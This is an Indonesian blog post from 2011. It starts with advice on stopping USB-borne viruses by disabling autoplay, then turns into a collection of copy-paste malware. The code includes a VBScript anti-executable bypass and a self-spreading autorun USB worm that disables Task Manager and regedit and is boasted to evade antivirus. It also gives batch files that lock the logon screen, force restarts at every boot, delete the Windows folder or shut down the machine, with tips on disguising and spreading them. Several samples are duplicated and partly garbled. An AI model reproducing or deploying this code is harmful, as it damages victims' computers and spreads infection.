Powered By Blogger

Selasa, 11 Januari 2011

cara mencegah penyebaran virus pada sistem komputer


banyak virus menyebar melalui media2 penyimpanan, flashdisk misalnya, kebanyakan orang dengan biadabnya mencolok flashdisknya tanpa tau apakah ada virus ato ngga di dalamnya (hahaha ... dasar brutal, kadang gw gitu juga sih, hehee)
salah satu cara mencegah virus masuk adalah dengan mencegah terjadinya eksekusi virus dengan cara mendisable autoplay pada komputer/laptop,
karena virus biasanya berjalan ato tereksekusi saat proses autoplay berjalan.
mungkin sudah banyak artikel2 yang beginian, tapi gpp dah, banyak2in aja, hehehe ...

cara pertama, buka komputer masing2 (jangan buka komputer gw, salah itu mah)
pertama klik start,
kemudian run,
trus ketik gpedit.msc
masuk ke user configuration dan computer configuration trus administrative templates, system, turn off autoplay, pilih enable dan pilih all drive, dan ok ...

cara kedua, yaitu melalui registry

klik start,
kemudian run,
ketik regedit
masuk ke HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
dan HKEY_USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
klik double NoDriveTypeAutoRun ganti value data mennjadi ff

ato jika kedua cara diatas dianggap susah, cara mudahnya ketika flashdisk dicolok, tekan shift agak lama, maka tidak akan ada proses autoplay berjalan,

satu langkah sudah kita lakukan,
usahakan jika membuka folder jangan menggunakan double click, karena justru disitu virus akan mengeksekusi dirinya,
jadi alternatifnya adalah menggunakan folder tree (dan ingat, jangan sekali2 melakukan klik double)
selanjutnya anda bisa scan pake antivirus (bagi yang punya antivirus)

klo yang ga punya antivirus? jangan khawatir, tenang ...
banyak jalan menuju roma, banyak cara mencegah virus ...
karena virus itu biasanya ber atribute hidden, maka langkah awal yang harus dilakukan yaitu melihat file2 yang hidden.
klik Tools, Folder Options, view,
kemudian conteng show hidden files and folders.
jika menu folder options tidak ada (hilang karna virus), alternatifnya yaitu instal aplikasi winrar ato apa aja aplikasi yang bisa ekstrak file, disini saya contohkan memakai winrar, dengan memakai winrar, semua file pasti akan terlihat ...

sekarang kita liat flashdisk kita, jika ada file yang aneh, jangan ragu untuk membasmi nya ... pasti tau kan isi flashdisk anda (kecuali bagi yang minjem punya temen, hehee)
jika virus tersebut memakai cara autoplay, maka akan terlihat file autorun.inf
jadi ada dua file disana bahkan banyak, satu virusnya (masih mentah) dan satu lagi file untuk menjalankannya yaitu autorun.inf
isi file itu adalah perintah untuk menjalankan virusnya, anda bisa membuka isi filenya jika mau, dengan catatan virusnya harus dihapus terlebih dahulu agar tidak tereksekusi saat membuka autorun.inf nya.
silahkan lihat, isi filenya adalah perintah2 yang berisi nama file virus tersebut untuk dieksekusi ketika proses autoplay.
yang saya sering temukan biasanya adalah pagefile.pif dan recycler dan file2 *.exe aneh lainnya. jadi jika anda menemukannya, jangan ragu untuk menghapus file tersebut, bulatkan tekadmu, huhuhuu ...
pagefile.pif file aslinya adalah pagefile.sys berada disystem kita, dan recycler, recycler mungkin tidak ada di dalam flashdisk, karena itu juga adalah file disystem kita.
jadi otomatis jika virus itu masuk, yang dirubahnya adalah file2 asli system kita dengan file2 bejat mereka, hahaha ...

satu cara lagi untuk mencegah, yaitu dengan cara membuat folder autorun.inf di dalam flashdisk
ikuti langkah2 berikut ...
buat folder dengan nama autorun.inf
kemudian buat satu ato beberapa file di dalamnya, misalnya txt, save dengan nama terserah anda dengan memakai hurup unicode, misalnya hurup batang (klik start, run, ketik charmap)
folder boleh di hidden ato terserah anda, sesuaikan sendiri.
cara ini berfungsi untuk menghindari file autorun.inf yang akan masuk ke dalam flashdisk, karena tidak diizinkannya penamaan yang sama terhadap sebuah file.

cara bobol anti executable



const HKEY_CLASSES_ROOT = &H80000000
const HKEY_CURRENT_USER = &H80000001
QUOT = chr(34)
strComputer = “.”
On error resume next
Tanya = MsgBox(”By Pass Exelockdown dengan Registry Shell Spawning”& _
vbNewLine & “Reset Exelockdown?”, 36,”Exelockdown Hacking – by Lovepassword”)
If Tanya = 6 Then ‘Bila dipilih YA
Set objRegistry = GetObject(”winmgmts:{impersonationLevel=… e}!\” &strComputer & ” ootdefault:StdRegProv”)
objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexy”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,,”exefile”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,”Content Type”,”application/x-msdownload”
objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexyPersistentHandler”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexyPersistentHandle… 2470-bae0-11cd-b579-08002b30bfeb}”
objRegistry.CreateKey HKEY_CURRENT_USER, “SoftwareMicrosoftWindowsCurrentVersionE… anced”
objRegistry.SetDWORDValue HKEY_CURRENT_USER,”SoftwareMicrosoftWind… VersionExplorerAdvanced”,”HideFileExt”,0
Set objWMIService = GetObject(”winmgmts:” _
& “{impersonationLevel=impersonate}!\” & strComputer & ” ootcimv2?)
Set colProcessList = objWMIService.ExecQuery _
(”SELECT * FROM Win32_Process WHERE Name = ‘explorer.exe’”)
For Each objProcess in colProcessList
objProcess.Terminate()
Next
set objShell = createobject(”Wscript.Shell”)
objShell.Run “explorer.exe”
msgbox “Copi file exe, rename menjadi file sexy, lalu jalankan”,vbInformation,”Exelockdown Hacking – by 060183”
End If

Silakan copy paste di notepad lalu pilih all files dan simpan dengan extensi .vbs.. jalankan…
Kemudian ubah extensi file .exe jadi .sexy Maka anda selamat dari pencekalan software anti executable. Ingat jangan disalah gunakan OK!!



@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVers ion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

setelah itu simpan nama file dengan ekstensi .bat

kedua, untuk autorun, anda isikan seperti dibawah ini:

[autorun]
open=nama_file.bat"

simpan dengan ekstensi .inf

jangan lupa kedua file tsb dijadikan dalam 1 folder
Selamat Mencoba
Thx

cara membuat virus


on error resume next

‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//

set kalong = createobject(“WScript.Shell”)

‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1, “REG_DWORD”

‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1, “REG_DWORD”

‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”

‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”

‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(“Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode



Save code di Notepad dengan cara FILE >> SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Virus Worm ini, lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f


· 
Lalu di SAVE AS ALL FILES dengan exstensi .bat misal : nama_file.bat. Kemudian buat Autorun.inf dengan script :

[autorun]
open=nama_file.bat


Lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf). File - file tersebut harus dalam 1 direktori, lalu seleksi file - file tersebut, klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY, copy file-file tersebut ke CD dan nikmati efeknya.

· 
‘El Magnifico MAN
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe erwinda_putra.exe.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\erwinda_putra.exe.vbs”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,”"
rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
if check 1 then
Wscript.sleep 100000
end if
loop while check1
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

do while year(now) >= 2008
WScript.sleep 20000

msgbox “salamaik tibo di virus camp_luck” & vbcrlf & _
“ondeh sanak maaf stek yo awak masuak ka sistem sanak anok-anok” & vbcrlf & _
“dunsanak komputer dunsanak awak kuasai stek dih. kini dunsanak masuak dalam permainan suruak manyuruan” & vbcrlf & _
“iko permainan yang paten ma dunsanak” & vbcrlf & _
vbcrlf & vbcrlf & _
” elok-elok selah dih dunsanak beko tajadi yang indak-indak ko” & vbcrlf & vbcrlf & _
” aaa kini saaiknyo ma dunsanak”

loop


Virus notepad berikutnya adalah virus yang sangat berbahaya. Buka program notepad. Copy paste scrib di bawah ini, simpan dengan nama ganas_banget.exe.vbs







X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Copy paste source code diatas ke notepad abis itu coba simpan dengan nama apa saja terserah Anda.
langkah-langkah:

1. buka notepad
2. copy+paste bahasa pemograman(yang bercetak tebal) di bawah ini:

option explicit

dim wshshell
set wshshell=wscript.createobject("wscript.shell")

dim x
for x = 1 to 100000000
wshshell.run "tourstart.exe"
next


Kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Sekarang buka Notepad-nya. Copy kode berikut :

'//--Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus--//
on error resume next

'//--Dim kata-kata berikut ini--//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

'//--Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information--//
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe k4l0n6.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

'//--Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\batch- k4l0n6.dll.vbs ")
tf.attributes = 32
set tf=fs.createtextfile(windowpath & "\batch- k4l0n6.dll.vbs",2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & "\batch- k4l0n6.dll.vbs ")
tf.attributes = 39
'//--Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok--//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
'//--Cek Drive--//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then

'//--Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\--//
set tf=fs.getfile(flashdrive.path &"\k4l0n6.dll.vbs ")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\k4l0n6.dll.vbs ",2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &"\k4l0n6.dll.vbs ")
tf.attributes = 39

'//--Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)--//
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next

'//--Manipulasi Registry--//

set kalong = createobject("WScript.Shell")

'//--Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY--//
kalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title"," THE KALONG v.s. ZAY "

'//--Manip – Set agar file hidden tidak ditampilkan di Explorer--//
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "0", "REG_DWORD"

'//--Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager--//
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"

'//--Manip – Disable klik kanan--//
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"

'//--Manip - Munculkan Pesan Setiap Windows Startup--//
kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe."

'//--Manip – Aktif setiap Windows Startup--//
kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- k4l0n6.dll.vbs "

'//--Manip – Ubah RegisteredOwner dan Organization--//
kalong.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "The Batrix"
kalong.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Kalong"

'//--Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan--//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
'Akhir dari Kode

Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.


DEL /F /Q C:\WINDOWS (simple kan?)

3. sekarang simpan dalam format .cmd, caranya : pada bagian "File nama" tulis virusganas.cmd dan "Save as type" pilih "All Files", visualisasinya


ada lagi ni...
kalo yg ini buat kompie jadi restart setiap kali booting...
1. buat script utama untuk restart

%SystemRoot%\system32\shutdown -r -f -t 00

'-r' untuk restart, kao untuk shutdown ganti jadi -s
'-f' untuk memaksa menutup aplikasi yg sedang berjalan
'-t' untuk waktu, 00 berarti 0 detik
namai misalnya 'restart.bat'

2. buat file *.reg untuk nambah string di registry

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Restart"="%systemroot%\\restart.bat"

simpan dengan nama a.reg misalnya

3. buat file utama buat mengeksekusi 2 file diatas

copy /y restart.bat %systemroot%\restart.bat
regedit /s a.reg

'copy /y restart.bat %systemroot%\restart.bat ' yg ini buat meng-copy file restart.bat ke c:\windows
'regedit /s a.reg' yg ini nwt mengeksekusi file registry (a.reg) secara diam-diam (silent)..
simpan dengan nama yg menggoda.. evil
misalnya cewe seksi...  evilevil

nah tinggal klik 2x aja pada file no.3 , efek baru akan keliatan kalo kompie di restart...


cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BANGUN TIDUR KU TERUS MENGHANCURKAN SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!
echo:
echo:
echo HALO SOBAT
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo IM ZATYA BAJA ITEM
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo NTAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS INI ADALAH VIRUS YANG SANGAT MEMATIKAN…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir Si_INDO_CRACKER
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo HAPPY BIRTHDAY
echo KOMPUTER KAMU BAGUS DEH
echo BOLEH Q INTIP DIKIT
echo HMM BOLEH JUGA NEH ISINYA
echo CALL ME YACHH +6284323xxxxxx GPRS JUGA BOLEH KOK
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MASUK PODIUM AKHIR!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo I LOVE U FULL
echo HA HA HA HA
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “BERTAUBATLAH, BACK TO UR GOD MOHON MAAF LAHIR DAN BATIN.”
Kemudian disimpan dengan nama terserah Kamu diakhiri .bat dan save type all file .
cth nya: Muhammadalfid.bat



cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BANGUN TIDUR KU TERUS MENGHANCURKAN SYSTEM…^__^
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!
echo:
echo:
echo HALO SOBAT
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo IM CATUREKO!!!
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo NTAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS INI ADALAH VIRUS YANG SANGAT MEMATIKAN…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir Si_INDO_CRACKER
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo HAPPY BIRTHDAY
echo KOMPUTER KAMU BAGUS DEH
echo BOLEH Q INTIP DIKIT
echo HMM BOLEH JUGA NEH ISINYA
echo CALL ME YACHH +6284323xxxxxx GPRS JUGA BOLEH KOK
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MASUK PODIUM AKHIR!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo I LOVE U FULL
echo HA HA HA HA
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “BERTAUBATLAH, BACK TO UR GOD MOHON MAAF LAHIR DAN BATIN.”

4. nah kalo udah simpen aja dengan nama "virus ganas.bat"
5. nah kalo mw ngaktifin virusnya tinggal klik file .batnya 2X...
6. tapi sebaiknya ni virus jangan di coba di komputer/laptop milik kita sendiri...ntar malah pusing kita.